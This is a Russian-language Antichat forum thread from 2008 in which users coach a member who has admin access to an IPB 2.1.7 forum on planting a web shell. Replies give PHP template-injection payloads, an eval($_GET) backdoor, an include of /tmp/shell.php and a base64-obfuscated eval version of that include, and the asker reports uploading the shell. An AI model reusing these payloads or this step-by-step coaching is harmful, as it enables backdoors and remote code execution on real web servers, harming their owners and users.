HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

не хватает прав...
  #1  
Старый 06.01.2008, 21:13
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию не хватает прав...

Есть админка ipb 2.1.7 можно ли залить шелл если нет ни одно папки с правами на запись ...?

Они запритили всё даже авики загружать..
 
Ответить с цитированием

  #2  
Старый 06.01.2008, 21:24
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

шаблоны правятся?
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #3  
Старый 06.01.2008, 21:30
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию

могу изминять фрагменты шаблонов
 
Ответить с цитированием

  #4  
Старый 06.01.2008, 21:33
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

ну инжектни пхп код тогда, в чем проблема.
Цитата:
{${код}}
ex: {${phpinfo();}}
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #5  
Старый 06.01.2008, 21:50
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию

Пасиб щя посмотрим=)
 
Ответить с цитированием

  #6  
Старый 06.01.2008, 22:00
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию

не идёт... при добавлении того же {${phpinfo();}} в шаблон он просто выводит белую страницу... на странице где этот шаблон =(
 
Ответить с цитированием

  #7  
Старый 06.01.2008, 22:24
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию

хмм если прописываю eval($_GET[ww]); и добовляю в адресной строке &ww=phpinfo()

то он мне выводит eval(phpinfo()); почему $_GET[] сработало а eval нет отключили ?
 
Ответить с цитированием

  #8  
Старый 06.01.2008, 22:55
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию

Вроде получилось залить в /tmp

форум находится тут
/home/blalba/www/forum
шелл залит сюда
/tmp/shell.php

нельзя никак на него попасть да?
 
Ответить с цитированием

  #9  
Старый 06.01.2008, 23:00
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами: 10393869

Репутация: 2032


По умолчанию

допиши в шаблоны
include('/tmp/shell.php');
 
Ответить с цитированием

  #10  
Старый 06.01.2008, 23:09
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

а лучше

{${eval(base64_decode(QGluY2x1ZGUoJy90bXAvc2hlbGwu cGhwJyk7));}}
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Хакер и закон! SladerNon Болталка 17 12.11.2009 09:42
Что можно сделать в админке форума IPB, если папка на смайлы не имеет прав? link Уязвимости CMS / форумов 5 06.04.2005 23:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.